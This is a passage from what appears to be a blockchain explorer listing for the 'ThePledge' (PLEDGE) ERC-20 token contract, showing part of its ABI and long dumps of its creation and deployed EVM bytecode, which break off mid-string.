IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradeInterval","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawTreasuryFunds","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040525f600660146101000a81548160ff0219169083151502179055505f600755600a60085560056009556009600a61003a91906106fc565b620186a06100489190610746565b600a556001600b5f6101000a81548160ff0219169083151502179055506103e8600c55348015610076575f80fd5b506040518060400160405280600981526020017f546865506c6564676500000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f504c45444745000000000000000000000000000000000000000000000000000081525081600390816100f291906109b8565b50806004908161010291906109b8565b505050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250503360065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061019e3060016102d960201b60201c565b6101b161dead60016102d960201b60201c565b6101c23360016102d960201b60201c565b6101f460065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016102d960201b60201c565b6102197395ee0406abb31e498cc4be025f4fb79c7ee1999a60016102d960201b60201c565b61023d725d1171e253c97309cc5a7624897e77cfad25c060016102d960201b60201c565b61026273d2e31fc48af4fb9a2a505d391aa8b359be08557360016102d960201b60201c565b6102877390c13d4d7642e0777c5362b2b6d2d0623887120e60016102d960201b60201c565b6102d460065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009600a6102ba91906106fc565b633b9aca006102c99190610746565b61042760201b60201c565b610b8d565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16036103d45780600d5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167fa4e60a6a63490154212e3490eb0d80d5356fc0b2872cf206bb19e36e190f69bd826040516103c79190610aa1565b60405180910390a2610423565b8173ffffffffffffffffffffffffffffffffffffffff167fa4e60a6a63490154212e3490eb0d80d5356fc0b2872cf206bb19e36e190f69bd8260405161041a9190610aa1565b60405180910390a25b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610495576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161048c90610b14565b60405180910390fd5b6104a65f838361058160201b60201c565b8060025f8282546104b79190610b32565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516105649190610b74565b60405180910390a361057d5f838361058660201b60201c565b5050565b505050565b505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561060d578086048111156105e9576105e861058b565b5b60018516156105f85780820291505b8081029050610606856105b8565b94506105cd565b94509492505050565b5f8261062557600190506106e0565b81610632575f90506106e0565b8160018114610648576002811461065257610681565b60019150506106e0565b60ff8411156106645761066361058b565b5b8360020a91508482111561067b5761067a61058b565b5b506106e0565b5060208310610133831016604e8410600b84101617156106b65782820a9050838111156106b1576106b061058b565b5b6106e0565b6106c384848460016105c4565b925090508184048111156106da576106d961058b565b5b81810290505b9392505050565b5f819050919050565b5f60ff82169050919050565b5f610706826106e7565b9150610711836106f0565b925061073e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610616565b905092915050565b5f610750826106e7565b915061075b836106e7565b9250828202610769816106e7565b915082820484148315176107805761077f61058b565b5b5092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061080257607f821691505b602082108103610815576108146107be565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026108777fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261083c565b610881868361083c565b95508019841693508086168417925050509392505050565b5f819050919050565b5f6108bc6108b76108b2846106e7565b610899565b6106e7565b9050919050565b5f819050919050565b6108d5836108a2565b6108e96108e1826108c3565b848454610848565b825550505050565b5f90565b6108fd6108f1565b6109088184846108cc565b505050565b5b8181101561092b576109205f826108f5565b60018101905061090e565b5050565b601f821115610970576109418161081b565b61094a8461082d565b81016020851015610959578190505b61096d6109658561082d565b83018261090d565b50505b505050565b5f82821c905092915050565b5f6109905f1984600802610975565b1980831691505092915050565b5f6109a88383610981565b9150826002028217905092915050565b6109c182610787565b67ffffffffffffffff8111156109da576109d9610791565b5b6109e482546107eb565b6109ef82828561092f565b5f60209050601f831160018114610a20575f8415610a0e578287015190505b610a18858261099d565b865550610a7f565b601f198416610a2e8661081b565b5f5b82811015610a5557848901518255600182019150602085019450602081019050610a30565b86831015610a725784890151610a6e601f891682610981565b8355505b6001600288020188555050505b505050505050565b5f8115159050919050565b610a9b81610a87565b82525050565b5f602082019050610ab45f830184610a92565b92915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f610afe601f83610aba565b9150610b0982610aca565b602082019050919050565b5f6020820190508181035f830152610b2b81610af2565b9050919050565b5f610b3c826106e7565b9150610b47836106e7565b9250828201905080821115610b5f57610b5e61058b565b5b92915050565b610b6e816106e7565b82525050565b5f602082019050610b875f830184610b65565b92915050565b608051612d6a610bb35f395f8181610af201528181610f9001526110390152612d6a5ff3fe6080604052600436106101fc575f3560e01c80637be993a71161010c578063ad5dff731161009f578063cf37eb2f1161006e578063cf37eb2f146106ed578063d152111a14610715578063dc08ab7a1461073d578063dd62ed3e14610767578063e063319e146107a357610203565b8063ad5dff7314610649578063ad62f7e414610685578063b8ab5189146106ad578063bb2ef594146106d757610203565b806395d89b41116100db57806395d89b411461057d578063a457c2d7146105a7578063a82f0131146105e3578063a9059cbb1461060d57610203565b80637be993a7146104e957806385af30c514610513578063902d55a51461053d57806394ad720d1461056757610203565b8063447479db1161018f5780636b1b49871161015e5780636b1b49871461041b5780636d1b229d1461044557806370a082311461046d578063744fbc7a146104a9578063751039fc146104d357610203565b8063447479db1461038b5780634eb80cbd146103a15780635b149feb146103c95780636678495a146103f357610203565b806323b872dd116101cb57806323b872dd146102c1578063313ce567146102fd57806339509351146103275780633d60a93e1461036357610203565b806301ba79111461020757806306fdde0314610231578063095ea7b31461025b57806318160ddd1461029757610203565b3661020357005b5f80fd5b348015610212575f80fd5b5061021b6107cb565b6040516102289190611fa8565b60405180910390f35b34801561023c575f80fd5b506102456107d1565b6040516102529190612031565b60405180910390f35b348015610266575f80fd5b50610281600480360381019061027c91906120d9565b610861565b60405161028e9190612131565b60405180910390f35b3480156102a2575f80fd5b506102ab610883565b6040516102b89190611fa8565b60405180910390f35b3480156102cc575f80fd5b506102e760048036038101906102e2919061214a565b61088c565b6040516102f49190612131565b60405180910390f35b348015610308575f80fd5b506103116108ba565b60405161031e91906121b5565b60405180910390f35b348015610332575f80fd5b5061034d600480360381019061034891906120d9565b6108c2565b60405161035a9190612131565b60405180910390f35b34801561036e575f80fd5b50610389600480360381019061038491906121ce565b6108f8565b005b348015610396575f80fd5b5061039f610902565b005b3480156103ac575f80fd5b506103c760048036038101906103c291906121ce565b6109e2565b005b3480156103d4575f80fd5b506103dd610a4f565b6040516103ea9190611fa8565b60405180910390f35b3480156103fe575f80fd5b50610419600480360381019061041491906120d9565b610a54565b005b348015610426575f80fd5b5061042f610a9a565b60405161043c9190611fa8565b60405180910390f35b348015610450575f80fd5b5061046b600480360381019061046691906121ce565b610a9e565b005b348015610478575f80fd5b50610493600480360381019061048e91906121f9565b610aab565b6040516104a09190611fa8565b60405180910390f35b3480156104b4575f80fd5b506104bd610af0565b6040516104ca919061227f565b60405180910390f35b3480156104de575f80fd5b506104e7610b14565b005b3480156104f4575f80fd5b506104fd610b1d565b60405161050a9190611fa8565b60405180910390f35b34801561051e575f80fd5b50610527610b23565b60405161053491906122a7565b60405180910390f35b348015610548575f80fd5b50610551610b48565b60405161055e9190611fa8565b60405180910390f35b348015610572575f80fd5b5061057b610b68565b005b348015610588575f80fd5b50610591610bfb565b60405161059e9190612031565b60405180910390f35b3480156105b2575f80fd5b506105cd60048036038101906105c891906120d9565b610c8b565b6040516105da9190612131565b60405180910390f35b3480156105ee575f80fd5b506105f7610d00565b6040516106049190612131565b60405180910390f35b348015610618575f80fd5b50610633600480360381019061062e91906120d9565b610d13565b6040516106409190612131565b60405180910390f35b348015610654575f80fd5b5061066f600480360381019061066a91906121f9565b610d35565b60405161067c9190612131565b60405180910390f35b348015610690575f80fd5b506106ab60048036038101906106a691906122ea565b610d87565b005b3480156106b8575f80fd5b506106c1610f0d565b6040516106ce9190612131565b60405180910390f35b3480156106e2575f80fd5b506106eb610f1f565b005b3480156106f8575f80fd5b50610713600480360381019061070e91906121ce565b6111bc565b005b348015610720575f80fd5b5061073b600480360381019061073691906122ea565b6111c6565b005b348015610748575f80fd5b50610751611314565b60405161075e9190611fa8565b60405180910390f35b348015610772575f80fd5b5061078d60048036038101906107889190612328565b61131a565b60405161079a9190611fa8565b60405180910390f35b3480156107ae575f80fd5b506107c960048036038101906107c49190612366565b61139c565b005b600a5481565b6060600380546107e0906123be565b80601f016020809104026020016040519081016040528092919081815260200182805461080c906123be565b80156108575780601f1061082e57610100808354040283529160200191610857565b820191905f5260205f20905b81548152906001019060200180831161083a57829003601f168201915b5050505050905090565b5f8061086b6113b8565b90506108788185856113bf565b600191505092915050565b5f600254905090565b5f806108966113b8565b90506108a3858285611582565b6108ae85858561160d565b60019150509392505050565b5f6009905090565b5f806108cc6113b8565b90506108ed8185856108de858961131a565b6108e8919061241b565b6113bf565b600191505092915050565b8060098190555050565b5f4711610944576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093b90612498565b60405180910390fd5b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461099c575f80fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f193505050501580156109df573d5f803e3d5ffd5b50565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1603610a425780600c81905550610a4c565b600c54600c819055505b50565b600581565b80600f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505050565b5f81565b610aa83382611a8f565b50565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f600881905550565b600c5481565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6009600a610b5691906125e5565b633b9aca00610b65919061262f565b81565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610bc0575f80fd5b5f610bca30610aab565b9050610bf83060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff168361160d565b50565b606060048054610c0a906123be565b80601f0160208091040260200160405190810160405280929190818152602001828054610c36906123be565b8015610c815780601f10610c5857610100808354040283529160200191610c81565b820191905f5260205f20905b815481529060010190602001808311610c6457829003601f168201915b5050505050905090565b5f80610c956113b8565b90505f610ca2828661131a565b905083811015610ce7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cde906126e0565b60405180910390fd5b610cf482868684036113bf565b60019250505092915050565b600660149054906101000a900460ff1681565b5f80610d1d6113b8565b9050610d2a81858561160d565b600191505092915050565b5f600d5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1603610e795760055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e619061276e565b60405180910390fd5b610e748282611c52565b610f09565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eff9061276e565b60405180910390fd5b5b5050565b600b5f9054906101000a900460ff1681565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1603611190576001600660146101000a81548160ff0219169083151502179055507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610ff7573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061101b91906127a0565b73ffffffffffffffffffffffffffffffffffffffff1663e6a43905307f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156110a0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110c491906127a0565b6040518363ffffffff1660e01b81526004016110e19291906127cb565b602060405180830381865afa1580156110fc573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061112091906127a0565b60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061118b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001611c52565b6111ba565b600660149054906101000a900460ff16600660146101000a81548160ff0219169083151502179055505b565b80600a8190555050565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16036112c15780600d5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167fa4e60a6a63490154212e3490eb0d80d5356fc0b2872cf206bb19e36e190f69bd826040516112b49190612131565b60405180910390a2611310565b8173ffffffffffffffffffffffffffffffffffffffff167fa4e60a6a63490154212e3490eb0d80d5356fc0b2872cf206bb19e36e190f69bd826040516113079190612131565b60405180910390a25b5050565b60095481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b80600b5f6101000a81548160ff02191690831515021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361142d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161142490612862565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361149b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611492906128f0565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516115759190611fa8565b60405180910390a3505050565b5f61158d848461131a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461160757818110156115f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115f090612958565b60405180910390fd5b61160684848484036113bf565b5b50505050565b5f81036116245761161f83835f611cf0565b611a8a565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141580156116ce575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b801561170657505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611740575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561183557600660149054906101000a900460ff1661183457600d5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806117f45750600d5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611833576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161182a906129c0565b60405180910390fd5b5b5b5f600d5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156118d45750600d5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b90505f81156119f857600e5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561195b57611954600c54611946600586611f5c90919063ffffffff16565b611f7190919063ffffffff16565b90506119d5565b600e5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156119d4576119d1600c546119c35f86611f5c90919063ffffffff16565b611f7190919063ffffffff16565b90505b5b5f8111156119e9576119e8853083611cf0565b5b80836119f591906129de565b92505b611a03858585611cf0565b42600f5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555042600f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555050505b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611afd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611af490612a81565b60405180910390fd5b611b08825f83611f86565b5f805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611b8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b8290612b0f565b60405180910390fd5b8181035f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f82825403925050819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611c3a9190611fa8565b60405180910390a3611c4d835f84611f8b565b505050565b80600e5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fb5a42fac6ad7d00a6f1eeb47bf703c78fa57d5ff75ed06ef7f033fd29b3d960660405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d5e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d5590612b9d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611dcc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc390612c2b565b60405180910390fd5b611dd7838383611f86565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611e5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5190612cb9565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611f439190611fa8565b60405180910390a3611f56848484611f8b565b50505050565b5f8183611f69919061262f565b905092915050565b5f8183611f7e9190612d04565b905092915050565b505050565b505050565b5f819050919050565b611fa281611f90565b82525050565b5f602082019050611fbb5f830184611f99565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61200382611fc1565b61200d8185611fcb565b935061201d818560208601611fdb565b61202681611fe9565b840191505092915050565b5f6020820190508181035f8301526120498184611ff9565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61207e82612055565b9050919050565b61208e81612074565b8114612098575f80fd5b50565b5f813590506120a981612085565b92915050565b6120b881611f90565b81146120c2575f80fd5b50565b5f813590506120d3816120af565b92915050565b5f80604083850312156120ef576120ee612051565b5b5f6120fc8582860161209b565b925050602061210d858286016120c5565b9150509250929050565b5f8115159050919050565b61212b81612117565b82525050565b5f6020820190506121445f830184612122565b92915050565b5f805f6060848603121561216157612160612051565b5b5f61216e8682870161209b565b935050602061217f8682870161209b565b9250506040612190868287016120c5565b9150509250925092565b5f60ff82169050919050565b6121af8161219a565b82525050565b5f6020820190506121c85f8301846121a6565b92915050565b5f602082840312156121e3576121e2612051565b5b5f6121f0848285016120c5565b91505092915050565b5f6020828403121561220e5761220d612051565b5b5f61221b8482850161209b565b91505092915050565b5f819050919050565b5f61224761224261223d84612055565b612224565b612055565b9050919050565b5f6122588261222d565b9050919050565b5f6122698261224e565b9050919050565b6122798161225f565b82525050565b5f6020820190506122925f830184612270565b92915050565b6122a181612074565b82525050565b5f6020820190506122ba5f830184612298565b92915050565b6122c981612117565b81146122d3575f80fd5b50565b5f813590506122e4816122c0565b92915050565b5f8060408385031215612300576122ff612051565b5b5f61230d8582860161209b565b925050602061231e858286016122d6565b9150509250929050565b5f806040838503121561233e5761233d612051565b5b5f61234b8582860161209b565b925050602061235c8582860161209b565b9150509250929050565b5f6020828403121561237b5761237a612051565b5b5f612388848285016122d6565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806123d557607f821691505b6020821081036123e8576123e7612391565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61242582611f90565b915061243083611f90565b9250828201905080821115612448576124476123ee565b5b92915050565b7f4e6f2062616c616e636520617661696c61626c650000000000000000000000005f82015250565b5f612482601483611fcb565b915061248d8261244e565b602082019050919050565b5f6020820190508181035f8301526124af81612476565b9050919050565b5f8160011c9050919050565b5f808291508390505b600185111561250b578086048111156124e7576124e66123ee565b5b60018516156124f65780820291505b8081029050612504856124b6565b94506124cb565b94509492505050565b5f8261252357600190506125de565b81612530575f90506125de565b816001811461254657600281146125505761257f565b60019150506125de565b60ff841115612562576125616123ee565b5b8360020a915084821115612579576125786123ee565b5b506125de565b5060208310610133831016604e8410600b84101617156125b45782820a9050838111156125af576125ae6123ee565b5b6125de565b6125c184848460016124c2565b925090508184048111156125d8576125d76123ee565b5b81810290505b9392505050565b5f6125ef82611f90565b91506125fa8361219a565b92506126277fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612514565b905092915050565b5f61263982611f90565b915061264483611f90565b925082820261265281611f90565b91508282048414831517612669576126686123ee565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6126ca602583611fcb565b91506126d582612670565b604082019050919050565b5f6020820190508181035f8301526126f7816126be565b9050919050565b7f43616e6e6f742072656d6f766520746865206d61696e206c69717569646974795f8201527f2070616972210000000000000000000000000000000000000000000000000000602082015250565b5f612758602683611fcb565b9150612763826126fe565b604082019050919050565b5f6020820190508181035f8301526127858161274c565b9050919050565b5f8151905061279a81612085565b92915050565b5f602082840312156127b5576127b4612051565b5b5f6127c28482850161278c565b91505092915050565b5f6040820190506127de5f830185612298565b6127eb6020830184612298565b9392505050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61284c602483611fcb565b9150612857826127f2565b604082019050919050565b5f6020820190508181035f83015261287981612840565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6128da602283611fcb565b91506128e582612880565b604082019050919050565b5f6020820190508181035f830152612907816128ce565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f612942601d83611fcb565b915061294d8261290e565b602082019050919050565b5f6020820190508181035f83015261296f81612936565b9050919050565b7f4d61726b657420697320696e61637469766521000000000000000000000000005f82015250565b5f6129aa601383611fcb565b91506129b582612976565b602082019050919050565b5f6020820190508181035f8301526129d78161299e565b9050919050565b5f6129e882611f90565b91506129f383611f90565b9250828203905081811115612a0b57612a0a6123ee565b5b92915050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f612a6b602183611fcb565b9150612a7682612a11565b604082019050919050565b5f6020820190508181035f830152612a9881612a5f565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f612af9602283611fcb565b9150612b0482612a9f565b604082019050919050565b5f6020820190508181035f830152612b2681612aed565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612b87602583611fcb565b9150612b9282612b2d565b604082019050919050565b5f6020820190508181035f830152612bb481612b7b565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612c15602383611fcb565b9150612c2082612bbb565b604082019050919050565b5f6020820190508181035f830152612c4281612c09565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f612ca3602683611fcb565b9150612cae82612c49565b604082019050919050565b5f6020820190508181035f830152612cd081612c97565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f612d0e82611f90565b9150612d1983611f90565b925082612d2957612d28612cd7565b5b82820490509291505056fea2646970667358221220599414b98ecf6d83a5cec0148e66a23a285430406f2f1254b2e1fad2ac787bf764736f6c634300081a0033

Deployed Bytecode

0x6080604052600436106101fc575f3560e01c80637be993a71161010c578063ad5dff731161009f578063cf37eb2f1161006e578063cf37eb2f146106ed578063d152111a14610715578063dc08ab7a1461073d578063dd62ed3e14610767578063e063319e146107a357610203565b8063ad5dff7314610649578063ad62f7e414610685578063b8ab5189146106ad578063bb2ef594146106d757610203565b806395d89b41116100db57806395d89b411461057d578063a457c2d7146105a7578063a82f0131146105e3578063a9059cbb1461060d57610203565b80637be993a7146104e957806385af30c514610513578063902d55a51461053d57806394ad720d1461056757610203565b8063447479db1161018f5780636b1b49871161015e5780636b1b49871461041b5780636d1b229d1461044557806370a082311461046d578063744fbc7a146104a9578063751039fc146104d357610203565b8063447479db1461038b5780634eb80cbd146103a15780635b149feb146103c95780636678495a146103f357610203565b806323b872dd116101cb57806323b872dd146102c1578063313ce567146102fd57806339509351146103275780633d60a93e1461036357610203565b806301ba79111461020757806306fdde0314610231578063095ea7b31461025b57806318160ddd1461029757610203565b3661020357005b5f80fd5b348015610212575f80fd5b5061021b6107cb565b6040516102289190611fa8565b60405180910390f35b34801561023c575f80fd5b506102456107d1565b6040516102529190612031565b60405180910390f35b348015610266575f80fd5b50610281600480360381019061027c91906120d9565b610861565b60405161028e9190612131565b60405180910390f35b3480156102a2575f80fd5b506102ab610883565b6040516102b89190611fa8565b60405180910390f35b3480156102cc575f80fd5b506102e760048036038101906102e2919061214a565b61088c565b6040516102f49190612131565b60405180910390f35b348015610308575f80fd5b506103116108ba565b60405161031e91906121b5565b60405180910390f35b348015610332575f80fd5b5061034d600480360381019061034891906120d9565b6108c2565b60405161035a9190612131565b60405180910390f35b34801561036e575